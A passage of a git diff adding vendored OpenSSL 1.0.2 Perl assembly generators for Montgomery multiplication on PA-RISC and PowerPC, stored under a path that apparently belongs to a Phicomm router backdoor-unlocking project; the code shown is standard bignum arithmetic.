+$ablo=$ab0;
+$abhi=$ab1;
+$nmlo0=$nm0;
+$nmhi0=$nm1;
+$nmlo1="%r9";
+$nmhi1="%r8";
+
+$code.=<<___;
+	b		L\$done
+	nop
+
+	.ALIGN		8
+L\$parisc11
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[0]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	ldw		-12($xfer),$ablo
+	ldw		-16($xfer),$hi0
+	ldw		-4($xfer),$nmlo0
+	ldw		-8($xfer),$nmhi0
+	fstds		${fab0},-16($xfer)
+	fstds		${fnm0},-8($xfer)
+
+	 ldo		8($idx),$idx		; j++++
+	 add		$ablo,$nmlo0,$nmlo0	; discarded
+	 addc		%r0,$nmhi0,$hi1
+	ldw		4($xfer),$ablo
+	ldw		0($xfer),$abhi
+	nop
+
+L\$1st_pa11
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j+1]*bp[0]
+	flddx		$idx($ap),${fai}	; ap[j,j+1]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j+1]*m
+	flddx		$idx($np),${fni}	; np[j,j+1]
+	 add		$hi0,$ablo,$ablo
+	ldw		12($xfer),$nmlo1
+	 addc		%r0,$abhi,$hi0
+	ldw		8($xfer),$nmhi1
+	 add		$ablo,$nmlo1,$nmlo1
+	fstds		${fab1},0($xfer)
+	 addc		%r0,$nmhi1,$nmhi1
+	fstds		${fnm1},8($xfer)
+	 add		$hi1,$nmlo1,$nmlo1
+	ldw		-12($xfer),$ablo
+	 addc		%r0,$nmhi1,$hi1
+	ldw		-16($xfer),$abhi
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[0]
+	ldw		-4($xfer),$nmlo0
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	ldw		-8($xfer),$nmhi0
+	 add		$hi0,$ablo,$ablo
+	stw		$nmlo1,-4($tp)		; tp[j-1]
+	 addc		%r0,$abhi,$hi0
+	fstds		${fab0},-16($xfer)
+	 add		$ablo,$nmlo0,$nmlo0
+	fstds		${fnm0},-8($xfer)
+	 addc		%r0,$nmhi0,$nmhi0
+	ldw		0($xfer),$abhi
+	 add		$hi1,$nmlo0,$nmlo0
+	ldw		4($xfer),$ablo
+	 stws,ma	$nmlo0,8($tp)		; tp[j-1]
+	addib,<>	8,$idx,L\$1st_pa11	; j++++
+	 addc		%r0,$nmhi0,$hi1
+
+	 ldw		8($xfer),$nmhi1
+	 ldw		12($xfer),$nmlo1
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j]*bp[0]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j]*m
+	 add		$hi0,$ablo,$ablo
+	fstds		${fab1},0($xfer)
+	 addc		%r0,$abhi,$hi0
+	fstds		${fnm1},8($xfer)
+	 add		$ablo,$nmlo1,$nmlo1
+	ldw		-16($xfer),$abhi
+	 addc		%r0,$nmhi1,$nmhi1
+	ldw		-12($xfer),$ablo
+	 add		$hi1,$nmlo1,$nmlo1
+	ldw		-8($xfer),$nmhi0
+	 addc		%r0,$nmhi1,$hi1
+	ldw		-4($xfer),$nmlo0
+
+	 add		$hi0,$ablo,$ablo
+	stw		$nmlo1,-4($tp)		; tp[j-1]
+	 addc		%r0,$abhi,$hi0
+	ldw		0($xfer),$abhi
+	 add		$ablo,$nmlo0,$nmlo0
+	ldw		4($xfer),$ablo
+	 addc		%r0,$nmhi0,$nmhi0
+	ldws,mb		8($xfer),$nmhi1
+	 add		$hi1,$nmlo0,$nmlo0
+	ldw		4($xfer),$nmlo1
+	 addc		%r0,$nmhi0,$hi1
+	stws,ma		$nmlo0,8($tp)		; tp[j-1]
+
+	ldo		-1($num),$num		; i--
+	subi		0,$arrsz,$idx		; j=0
+
+	 fldws,ma	4($bp),${fbi}		; bp[1]
+	 flddx		$idx($ap),${fai}	; ap[0,1]
+	 flddx		$idx($np),${fni}	; np[0,1]
+	 fldws		8($xfer),${fti}R	; tp[0]
+	add		$hi0,$ablo,$ablo
+	addc		%r0,$abhi,$hi0
+	 ldo		8($idx),$idx		; j++++
+	 xmpyu		${fai}L,${fbi},${fab0}	; ap[0]*bp[1]
+	 xmpyu		${fai}R,${fbi},${fab1}	; ap[1]*bp[1]
+	add		$hi1,$nmlo1,$nmlo1
+	addc		%r0,$nmhi1,$nmhi1
+	add		$ablo,$nmlo1,$nmlo1
+	addc		%r0,$nmhi1,$hi1
+	 fstws,mb	${fab0}L,-8($xfer)	; save high part
+	stw		$nmlo1,-4($tp)		; tp[j-1]
+
+	 fcpy,sgl	%fr0,${fti}L		; zero high part
+	 fcpy,sgl	%fr0,${fab0}L
+	add		$hi1,$hi0,$hi0
+	addc		%r0,%r0,$hi1
+	 fcnvxf,dbl,dbl	${fti},${fti}		; 32-bit unsigned int -> double
+	 fcnvxf,dbl,dbl	${fab0},${fab0}
+	stw		$hi0,0($tp)
+	stw		$hi1,4($tp)
+
+	fadd,dbl	${fti},${fab0},${fab0}	; add tp[0]
+	fcnvfx,dbl,dbl	${fab0},${fab0}		; double -> 33-bit unsigned int
+	xmpyu		${fn0},${fab0}R,${fm0}
+	ldo		`$LOCALS+32+4`($fp),$tp
+L\$outer_pa11
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[0]*m
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[1]*m
+	fstds		${fab0},-16($xfer)	; 33-bit value
+	fstds		${fnm0},-8($xfer)
+	 flddx		$idx($ap),${fai}	; ap[2,3]
+	 flddx		$idx($np),${fni}	; np[2,3]
+	ldw		-16($xfer),$abhi	; carry bit actually
+	 ldo		8($idx),$idx		; j++++
+	ldw		-12($xfer),$ablo
+	ldw		-8($xfer),$nmhi0
+	ldw		-4($xfer),$nmlo0
+	ldw		0($xfer),$hi0		; high part
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[i]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	fstds		${fab1},0($xfer)
+	 addl		$abhi,$hi0,$hi0		; account carry bit
+	fstds		${fnm1},8($xfer)
+	 add		$ablo,$nmlo0,$nmlo0	; discarded
+	ldw		0($tp),$ti1		; tp[1]
+	 addc		%r0,$nmhi0,$hi1
+	fstds		${fab0},-16($xfer)
+	fstds		${fnm0},-8($xfer)
+	ldw		4($xfer),$ablo
+	ldw		0($xfer),$abhi
+
+L\$inner_pa11
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j+1]*bp[i]
+	flddx		$idx($ap),${fai}	; ap[j,j+1]
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j+1]*m
+	flddx		$idx($np),${fni}	; np[j,j+1]
+	 add		$hi0,$ablo,$ablo
+	ldw		4($tp),$ti0		; tp[j]
+	 addc		%r0,$abhi,$abhi
+	ldw		12($xfer),$nmlo1
+	 add		$ti1,$ablo,$ablo
+	ldw		8($xfer),$nmhi1
+	 addc		%r0,$abhi,$hi0
+	fstds		${fab1},0($xfer)
+	 add		$ablo,$nmlo1,$nmlo1
+	fstds		${fnm1},8($xfer)
+	 addc		%r0,$nmhi1,$nmhi1
+	ldw		-12($xfer),$ablo
+	 add		$hi1,$nmlo1,$nmlo1
+	ldw		-16($xfer),$abhi
+	 addc		%r0,$nmhi1,$hi1
+
+	xmpyu		${fai}L,${fbi},${fab0}	; ap[j]*bp[i]
+	ldw		8($tp),$ti1		; tp[j]
+	xmpyu		${fni}L,${fm0}R,${fnm0}	; np[j]*m
+	ldw		-4($xfer),$nmlo0
+	 add		$hi0,$ablo,$ablo
+	ldw		-8($xfer),$nmhi0
+	 addc		%r0,$abhi,$abhi
+	stw		$nmlo1,-4($tp)		; tp[j-1]
+	 add		$ti0,$ablo,$ablo
+	fstds		${fab0},-16($xfer)
+	 addc		%r0,$abhi,$hi0
+	fstds		${fnm0},-8($xfer)
+	 add		$ablo,$nmlo0,$nmlo0
+	ldw		4($xfer),$ablo
+	 addc		%r0,$nmhi0,$nmhi0
+	ldw		0($xfer),$abhi
+	 add		$hi1,$nmlo0,$nmlo0
+	 stws,ma	$nmlo0,8($tp)		; tp[j-1]
+	addib,<>	8,$idx,L\$inner_pa11	; j++++
+	 addc		%r0,$nmhi0,$hi1
+
+	xmpyu		${fai}R,${fbi},${fab1}	; ap[j]*bp[i]
+	ldw		12($xfer),$nmlo1
+	xmpyu		${fni}R,${fm0}R,${fnm1}	; np[j]*m
+	ldw		8($xfer),$nmhi1
+	 add		$hi0,$ablo,$ablo
+	ldw		4($tp),$ti0		; tp[j]
+	 addc		%r0,$abhi,$abhi
+	fstds		${fab1},0($xfer)
+	 add		$ti1,$ablo,$ablo
+	fstds		${fnm1},8($xfer)
+	 addc		%r0,$abhi,$hi0
+	ldw		-16($xfer),$abhi
+	 add		$ablo,$nmlo1,$nmlo1
+	ldw		-12($xfer),$ablo
+	 addc		%r0,$nmhi1,$nmhi1
+	ldw		-8($xfer),$nmhi0
+	 add		$hi1,$nmlo1,$nmlo1
+	ldw		-4($xfer),$nmlo0
+	 addc		%r0,$nmhi1,$hi1
+
+	add		$hi0,$ablo,$ablo
+	 stw		$nmlo1,-4($tp)		; tp[j-1]
+	addc		%r0,$abhi,$abhi
+	 add		$ti0,$ablo,$ablo
+	ldw		8($tp),$ti1		; tp[j]
+	 addc		%r0,$abhi,$hi0
+	ldw		0($xfer),$abhi
+	 add		$ablo,$nmlo0,$nmlo0
+	ldw		4($xfer),$ablo
+	 addc		%r0,$nmhi0,$nmhi0
+	ldws,mb		8($xfer),$nmhi1
+	 add		$hi1,$nmlo0,$nmlo0
+	ldw		4($xfer),$nmlo1
+	 addc		%r0,$nmhi0,$hi1
+	 stws,ma	$nmlo0,8($tp)		; tp[j-1]
+
+	addib,=		-1,$num,L\$outerdone_pa11; i--
+	subi		0,$arrsz,$idx		; j=0
+
+	 fldws,ma	4($bp),${fbi}		; bp[i]
+	 flddx		$idx($ap),${fai}	; ap[0]
+	add		$hi0,$ablo,$ablo
+	addc		%r0,$abhi,$abhi
+	 flddx		$idx($np),${fni}	; np[0]
+	 fldws		8($xfer),${fti}R	; tp[0]
+	add		$ti1,$ablo,$ablo
+	addc		%r0,$abhi,$hi0
+
+	 ldo		8($idx),$idx		; j++++
+	 xmpyu		${fai}L,${fbi},${fab0}	; ap[0]*bp[i]
+	 xmpyu		${fai}R,${fbi},${fab1}	; ap[1]*bp[i]
+	ldw		4($tp),$ti0		; tp[j]
+
+	add		$hi1,$nmlo1,$nmlo1
+	addc		%r0,$nmhi1,$nmhi1
+	 fstws,mb	${fab0}L,-8($xfer)	; save high part
+	add		$ablo,$nmlo1,$nmlo1
+	addc		%r0,$nmhi1,$hi1
+	 fcpy,sgl	%fr0,${fti}L		; zero high part
+	 fcpy,sgl	%fr0,${fab0}L
+	stw		$nmlo1,-4($tp)		; tp[j-1]
+
+	 fcnvxf,dbl,dbl	${fti},${fti}		; 32-bit unsigned int -> double
+	 fcnvxf,dbl,dbl	${fab0},${fab0}
+	add		$hi1,$hi0,$hi0
+	addc		%r0,%r0,$hi1
+	 fadd,dbl	${fti},${fab0},${fab0}	; add tp[0]
+	add		$ti0,$hi0,$hi0
+	addc		%r0,$hi1,$hi1
+	 fcnvfx,dbl,dbl	${fab0},${fab0}		; double -> 33-bit unsigned int
+	stw		$hi0,0($tp)
+	stw		$hi1,4($tp)
+	 xmpyu		${fn0},${fab0}R,${fm0}
+
+	b		L\$outer_pa11
+	ldo		`$LOCALS+32+4`($fp),$tp
+
+L\$outerdone_pa11
+	add		$hi0,$ablo,$ablo
+	addc		%r0,$abhi,$abhi
+	add		$ti1,$ablo,$ablo
+	addc		%r0,$abhi,$hi0
+
+	ldw		4($tp),$ti0		; tp[j]
+
+	add		$hi1,$nmlo1,$nmlo1
+	addc		%r0,$nmhi1,$nmhi1
+	add		$ablo,$nmlo1,$nmlo1
+	addc		%r0,$nmhi1,$hi1
+	stw		$nmlo1,-4($tp)		; tp[j-1]
+
+	add		$hi1,$hi0,$hi0
+	addc		%r0,%r0,$hi1
+	add		$ti0,$hi0,$hi0
+	addc		%r0,$hi1,$hi1
+	stw		$hi0,0($tp)
+	stw		$hi1,4($tp)
+
+	ldo		`$LOCALS+32+4`($fp),$tp
+	sub		%r0,%r0,%r0		; clear borrow
+	ldw		-4($tp),$ti0
+	addl		$tp,$arrsz,$tp
+L\$sub_pa11
+	ldwx		$idx($np),$hi0
+	subb		$ti0,$hi0,$hi1
+	ldwx		$idx($tp),$ti0
+	addib,<>	4,$idx,L\$sub_pa11
+	stws,ma		$hi1,4($rp)
+
+	subb		$ti0,%r0,$hi1
+	ldo		-4($tp),$tp
+	and		$tp,$hi1,$ap
+	andcm		$rp,$hi1,$bp
+	or		$ap,$bp,$np
+
+	sub		$rp,$arrsz,$rp		; rewind rp
+	subi		0,$arrsz,$idx
+	ldo		`$LOCALS+32`($fp),$tp
+L\$copy_pa11
+	ldwx		$idx($np),$hi0
+	stws,ma		%r0,4($tp)
+	addib,<>	4,$idx,L\$copy_pa11
+	stws,ma		$hi0,4($rp)	
+
+	nop					; alignment
+L\$done
+___
+}
+
+$code.=<<___;
+	ldi		1,%r28			; signal "handled"
+	ldo		$FRAME($fp),%sp		; destroy tp[num+1]
+
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2	; standard epilogue
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+	$POP	`-$FRAME+4*$SIZE_T`(%sp),%r7
+	$POP	`-$FRAME+5*$SIZE_T`(%sp),%r8
+	$POP	`-$FRAME+6*$SIZE_T`(%sp),%r9
+	$POP	`-$FRAME+7*$SIZE_T`(%sp),%r10
+L\$abort
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+	.STRINGZ "Montgomery Multiplication for PA-RISC, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+# Explicitly encode PA-RISC 2.0 instructions used in this module, so
+# that it can be compiled with .LEVEL 1.0. It should be noted that I
+# wouldn't have to do this, if GNU assembler understood .ALLOW 2.0
+# directive...
+
+my $ldd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "ldd$mod\t$args";
+
+    if ($args =~ /%r([0-9]+)\(%r([0-9]+)\),%r([0-9]+)/)		# format 4
+    {	my $opcode=(0x03<<26)|($2<<21)|($1<<16)|(3<<6)|$3;
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /(\-?[0-9]+)\(%r([0-9]+)\),%r([0-9]+)/)	# format 5
+    {	my $opcode=(0x03<<26)|($2<<21)|(1<<12)|(3<<6)|$3;
+	$opcode|=(($1&0xF)<<17)|(($1&0x10)<<12);		# encode offset
+	$opcode|=(1<<5)  if ($mod =~ /^,m/);
+	$opcode|=(1<<13) if ($mod =~ /^,mb/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $std = sub {
+  my ($mod,$args) = @_;
+  my $orig = "std$mod\t$args";
+
+    if ($args =~ /%r([0-9]+),(\-?[0-9]+)\(%r([0-9]+)\)/)	# format 6
+    {	my $opcode=(0x03<<26)|($3<<21)|($1<<16)|(1<<12)|(0xB<<6);
+	$opcode|=(($2&0xF)<<1)|(($2&0x10)>>4);			# encode offset
+	$opcode|=(1<<5)  if ($mod =~ /^,m/);
+	$opcode|=(1<<13) if ($mod =~ /^,mb/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $extrd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "extrd$mod\t$args";
+
+    # I only have ",u" completer, it's implicitly encoded...
+    if ($args =~ /%r([0-9]+),([0-9]+),([0-9]+),%r([0-9]+)/)	# format 15
+    {	my $opcode=(0x36<<26)|($1<<21)|($4<<16);
+	my $len=32-$3;
+	$opcode |= (($2&0x20)<<6)|(($2&0x1f)<<5);		# encode pos
+	$opcode |= (($len&0x20)<<7)|($len&0x1f);		# encode len
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    elsif ($args =~ /%r([0-9]+),%sar,([0-9]+),%r([0-9]+)/)	# format 12
+    {	my $opcode=(0x34<<26)|($1<<21)|($3<<16)|(2<<11)|(1<<9);
+	my $len=32-$2;
+	$opcode |= (($len&0x20)<<3)|($len&0x1f);		# encode len
+	$opcode |= (1<<13) if ($mod =~ /,\**=/);
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $shrpd = sub {
+  my ($mod,$args) = @_;
+  my $orig = "shrpd$mod\t$args";
+
+    if ($args =~ /%r([0-9]+),%r([0-9]+),([0-9]+),%r([0-9]+)/)	# format 14
+    {	my $opcode=(0x34<<26)|($2<<21)|($1<<16)|(1<<10)|$4;
+	my $cpos=63-$3;
+	$opcode |= (($cpos&0x20)<<6)|(($cpos&0x1f)<<5);		# encode sa
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig;
+    }
+    else { "\t".$orig; }
+};
+
+my $sub = sub {
+  my ($mod,$args) = @_;
+  my $orig = "sub$mod\t$args";
+
+    if ($mod eq ",db" && $args =~ /%r([0-9]+),%r([0-9]+),%r([0-9]+)/) {
+	my $opcode=(0x02<<26)|($2<<21)|($1<<16)|$3;
+	$opcode|=(1<<10);	# e1
+	$opcode|=(1<<8);	# e2
+	$opcode|=(1<<5);	# d
+	sprintf "\t.WORD\t0x%08x\t; %s",$opcode,$orig
+    }
+    else { "\t".$orig; }
+};
+
+sub assemble {
+  my ($mnemonic,$mod,$args)=@_;
+  my $opcode = eval("\$$mnemonic");
+
+    ref($opcode) eq 'CODE' ? &$opcode($mod,$args) : "\t$mnemonic$mod\t$args";
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+	# flip word order in 64-bit mode...
+	s/(xmpyu\s+)($fai|$fni)([LR])/$1.$2.($3 eq "L"?"R":"L")/e if ($BN_SZ==8);
+	# assemble 2.0 instructions in 32-bit mode...
+	s/^\s+([a-z]+)([\S]*)\s+([\S]*)/&assemble($1,$2,$3)/e if ($BN_SZ==4);
+
+	s/\bbv\b/bve/gm	if ($SIZE_T==8);
+
+	print $_,"\n";
+}
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc-mont.pl
new file mode 100644
index 0000000..da69c6a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc-mont.pl
@@ -0,0 +1,335 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# April 2006
+
+# "Teaser" Montgomery multiplication module for PowerPC. It's possible
+# to gain a bit more by modulo-scheduling outer loop, then dedicated
+# squaring procedure should give further 20% and code can be adapted
+# for 32-bit application running on 64-bit CPU. As for the latter.
+# It won't be able to achieve "native" 64-bit performance, because in
+# 32-bit application context every addc instruction will have to be
+# expanded as addc, twice right shift by 32 and finally adde, etc.
+# So far RSA *sign* performance improvement over pre-bn_mul_mont asm
+# for 64-bit application running on PPC970/G5 is:
+#
+# 512-bit	+65%	
+# 1024-bit	+35%
+# 2048-bit	+18%
+# 4096-bit	+4%
+
+$flavour = shift;
+
+if ($flavour =~ /32/) {
+	$BITS=	32;
+	$BNSZ=	$BITS/8;
+	$SIZE_T=4;
+	$RZONE=	224;
+
+	$LD=	"lwz";		# load
+	$LDU=	"lwzu";		# load and update
+	$LDX=	"lwzx";		# load indexed
+	$ST=	"stw";		# store
+	$STU=	"stwu";		# store and update
+	$STX=	"stwx";		# store indexed
+	$STUX=	"stwux";	# store indexed and update
+	$UMULL=	"mullw";	# unsigned multiply low
+	$UMULH=	"mulhwu";	# unsigned multiply high
+	$UCMP=	"cmplw";	# unsigned compare
+	$SHRI=	"srwi";		# unsigned shift right by immediate	
+	$PUSH=	$ST;
+	$POP=	$LD;
+} elsif ($flavour =~ /64/) {
+	$BITS=	64;
+	$BNSZ=	$BITS/8;
+	$SIZE_T=8;
+	$RZONE=	288;
+
+	# same as above, but 64-bit mnemonics...
+	$LD=	"ld";		# load
+	$LDU=	"ldu";		# load and update
+	$LDX=	"ldx";		# load indexed
+	$ST=	"std";		# store
+	$STU=	"stdu";		# store and update
+	$STX=	"stdx";		# store indexed
+	$STUX=	"stdux";	# store indexed and update
+	$UMULL=	"mulld";	# unsigned multiply low
+	$UMULH=	"mulhdu";	# unsigned multiply high
+	$UCMP=	"cmpld";	# unsigned compare
+	$SHRI=	"srdi";		# unsigned shift right by immediate	
+	$PUSH=	$ST;
+	$POP=	$LD;
+} else { die "nonsense $flavour"; }
+
+$FRAME=8*$SIZE_T+$RZONE;
+$LOCALS=8*$SIZE_T;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$sp="r1";
+$toc="r2";
+$rp="r3";	$ovf="r3";
+$ap="r4";
+$bp="r5";
+$np="r6";
+$n0="r7";
+$num="r8";
+$rp="r9";	# $rp is reassigned
+$aj="r10";
+$nj="r11";
+$tj="r12";
+# non-volatile registers
+$i="r20";
+$j="r21";
+$tp="r22";
+$m0="r23";
+$m1="r24";
+$lo0="r25";
+$hi0="r26";
+$lo1="r27";
+$hi1="r28";
+$alo="r29";
+$ahi="r30";
+$nlo="r31";
+#
+$nhi="r0";
+
+$code=<<___;
+.machine "any"
+.text
+
+.globl	.bn_mul_mont_int
+.align	4
+.bn_mul_mont_int:
+	cmpwi	$num,4
+	mr	$rp,r3		; $rp is reassigned
+	li	r3,0
+	bltlr
+___
+$code.=<<___ if ($BNSZ==4);
+	cmpwi	$num,32		; longer key performance is not better
+	bgelr
+___
+$code.=<<___;
+	slwi	$num,$num,`log($BNSZ)/log(2)`
+	li	$tj,-4096
+	addi	$ovf,$num,$FRAME
+	subf	$ovf,$ovf,$sp	; $sp-$ovf
+	and	$ovf,$ovf,$tj	; minimize TLB usage
+	subf	$ovf,$sp,$ovf	; $ovf-$sp
+	mr	$tj,$sp
+	srwi	$num,$num,`log($BNSZ)/log(2)`
+	$STUX	$sp,$sp,$ovf
+
+	$PUSH	r20,`-12*$SIZE_T`($tj)
+	$PUSH	r21,`-11*$SIZE_T`($tj)
+	$PUSH	r22,`-10*$SIZE_T`($tj)
+	$PUSH	r23,`-9*$SIZE_T`($tj)
+	$PUSH	r24,`-8*$SIZE_T`($tj)
+	$PUSH	r25,`-7*$SIZE_T`($tj)
+	$PUSH	r26,`-6*$SIZE_T`($tj)
+	$PUSH	r27,`-5*$SIZE_T`($tj)
+	$PUSH	r28,`-4*$SIZE_T`($tj)
+	$PUSH	r29,`-3*$SIZE_T`($tj)
+	$PUSH	r30,`-2*$SIZE_T`($tj)
+	$PUSH	r31,`-1*$SIZE_T`($tj)
+
+	$LD	$n0,0($n0)	; pull n0[0] value
+	addi	$num,$num,-2	; adjust $num for counter register
+
+	$LD	$m0,0($bp)	; m0=bp[0]
+	$LD	$aj,0($ap)	; ap[0]
+	addi	$tp,$sp,$LOCALS
+	$UMULL	$lo0,$aj,$m0	; ap[0]*bp[0]
+	$UMULH	$hi0,$aj,$m0
+
+	$LD	$aj,$BNSZ($ap)	; ap[1]
+	$LD	$nj,0($np)	; np[0]
+
+	$UMULL	$m1,$lo0,$n0	; "tp[0]"*n0
+
+	$UMULL	$alo,$aj,$m0	; ap[1]*bp[0]
+	$UMULH	$ahi,$aj,$m0
+
+	$UMULL	$lo1,$nj,$m1	; np[0]*m1
+	$UMULH	$hi1,$nj,$m1
+	$LD	$nj,$BNSZ($np)	; np[1]
+	addc	$lo1,$lo1,$lo0
+	addze	$hi1,$hi1
+
+	$UMULL	$nlo,$nj,$m1	; np[1]*m1
+	$UMULH	$nhi,$nj,$m1
+
+	mtctr	$num
+	li	$j,`2*$BNSZ`
+.align	4
+L1st:
+	$LDX	$aj,$ap,$j	; ap[j]
+	addc	$lo0,$alo,$hi0
+	$LDX	$nj,$np,$j	; np[j]
+	addze	$hi0,$ahi
+	$UMULL	$alo,$aj,$m0	; ap[j]*bp[0]
+	addc	$lo1,$nlo,$hi1
+	$UMULH	$ahi,$aj,$m0
+	addze	$hi1,$nhi
+	$UMULL	$nlo,$nj,$m1	; np[j]*m1
+	addc	$lo1,$lo1,$lo0	; np[j]*m1+ap[j]*bp[0]
+	$UMULH	$nhi,$nj,$m1
+	addze	$hi1,$hi1
+	$ST	$lo1,0($tp)	; tp[j-1]
+
+	addi	$j,$j,$BNSZ	; j++
+	addi	$tp,$tp,$BNSZ	; tp++
+	bdnz-	L1st
+;L1st
+	addc	$lo0,$alo,$hi0
+	addze	$hi0,$ahi
+
+	addc	$lo1,$nlo,$hi1
+	addze	$hi1,$nhi
+	addc	$lo1,$lo1,$lo0	; np[j]*m1+ap[j]*bp[0]
+	addze	$hi1,$hi1
+	$ST	$lo1,0($tp)	; tp[j-1]
+
+	li	$ovf,0
+	addc	$hi1,$hi1,$hi0
+	addze	$ovf,$ovf	; upmost overflow bit
+	$ST	$hi1,$BNSZ($tp)
+
+	li	$i,$BNSZ
+.align	4
+Louter:
+	$LDX	$m0,$bp,$i	; m0=bp[i]
+	$LD	$aj,0($ap)	; ap[0]
+	addi	$tp,$sp,$LOCALS
+	$LD	$tj,$LOCALS($sp); tp[0]
+	$UMULL	$lo0,$aj,$m0	; ap[0]*bp[i]
+	$UMULH	$hi0,$aj,$m0
+	$LD	$aj,$BNSZ($ap)	; ap[1]
+	$LD	$nj,0($np)	; np[0]
+	addc	$lo0,$lo0,$tj	; ap[0]*bp[i]+tp[0]
+	$UMULL	$alo,$aj,$m0	; ap[j]*bp[i]
+	addze	$hi0,$hi0
+	$UMULL	$m1,$lo0,$n0	; tp[0]*n0
+	$UMULH	$ahi,$aj,$m0
+	$UMULL	$lo1,$nj,$m1	; np[0]*m1
+	$UMULH	$hi1,$nj,$m1
+	$LD	$nj,$BNSZ($np)	; np[1]
+	addc	$lo1,$lo1,$lo0
+	$UMULL	$nlo,$nj,$m1	; np[1]*m1
+	addze	$hi1,$hi1
+	$UMULH	$nhi,$nj,$m1
+
+	mtctr	$num
+	li	$j,`2*$BNSZ`
+.align	4
+Linner:
+	$LDX	$aj,$ap,$j	; ap[j]
+	addc	$lo0,$alo,$hi0
+	$LD	$tj,$BNSZ($tp)	; tp[j]
+	addze	$hi0,$ahi
+	$LDX	$nj,$np,$j	; np[j]
+	addc	$lo1,$nlo,$hi1
+	$UMULL	$alo,$aj,$m0	; ap[j]*bp[i]
+	addze	$hi1,$nhi
+	$UMULH	$ahi,$aj,$m0
+	addc	$lo0,$lo0,$tj	; ap[j]*bp[i]+tp[j]
+	$UMULL	$nlo,$nj,$m1	; np[j]*m1
+	addze	$hi0,$hi0
+	$UMULH	$nhi,$nj,$m1
+	addc	$lo1,$lo1,$lo0	; np[j]*m1+ap[j]*bp[i]+tp[j]
+	addi	$j,$j,$BNSZ	; j++
+	addze	$hi1,$hi1
+	$ST	$lo1,0($tp)	; tp[j-1]
+	addi	$tp,$tp,$BNSZ	; tp++
+	bdnz-	Linner
+;Linner
+	$LD	$tj,$BNSZ($tp)	; tp[j]
+	addc	$lo0,$alo,$hi0
+	addze	$hi0,$ahi
+	addc	$lo0,$lo0,$tj	; ap[j]*bp[i]+tp[j]
+	addze	$hi0,$hi0
+
+	addc	$lo1,$nlo,$hi1
+	addze	$hi1,$nhi
+	addc	$lo1,$lo1,$lo0	; np[j]*m1+ap[j]*bp[i]+tp[j]
+	addze	$hi1,$hi1
+	$ST	$lo1,0($tp)	; tp[j-1]
+
+	addic	$ovf,$ovf,-1	; move upmost overflow to XER[CA]
+	li	$ovf,0
+	adde	$hi1,$hi1,$hi0
+	addze	$ovf,$ovf
+	$ST	$hi1,$BNSZ($tp)
+;
+	slwi	$tj,$num,`log($BNSZ)/log(2)`
+	$UCMP	$i,$tj
+	addi	$i,$i,$BNSZ
+	ble-	Louter
+
+	addi	$num,$num,2	; restore $num
+	subfc	$j,$j,$j	; j=0 and "clear" XER[CA]
+	addi	$tp,$sp,$LOCALS
+	mtctr	$num
+
+.align	4
+Lsub:	$LDX	$tj,$tp,$j
+	$LDX	$nj,$np,$j
+	subfe	$aj,$nj,$tj	; tp[j]-np[j]
+	$STX	$aj,$rp,$j
+	addi	$j,$j,$BNSZ
+	bdnz-	Lsub
+
+	li	$j,0
+	mtctr	$num
+	subfe	$ovf,$j,$ovf	; handle upmost overflow bit
+	and	$ap,$tp,$ovf
+	andc	$np,$rp,$ovf
+	or	$ap,$ap,$np	; ap=borrow?tp:rp
+
+.align	4
+Lcopy:				; copy or in-place refresh
+	$LDX	$tj,$ap,$j
+	$STX	$tj,$rp,$j
+	$STX	$j,$tp,$j	; zap at once
+	addi	$j,$j,$BNSZ
+	bdnz-	Lcopy
+
+	$POP	$tj,0($sp)
+	li	r3,1
+	$POP	r20,`-12*$SIZE_T`($tj)
+	$POP	r21,`-11*$SIZE_T`($tj)
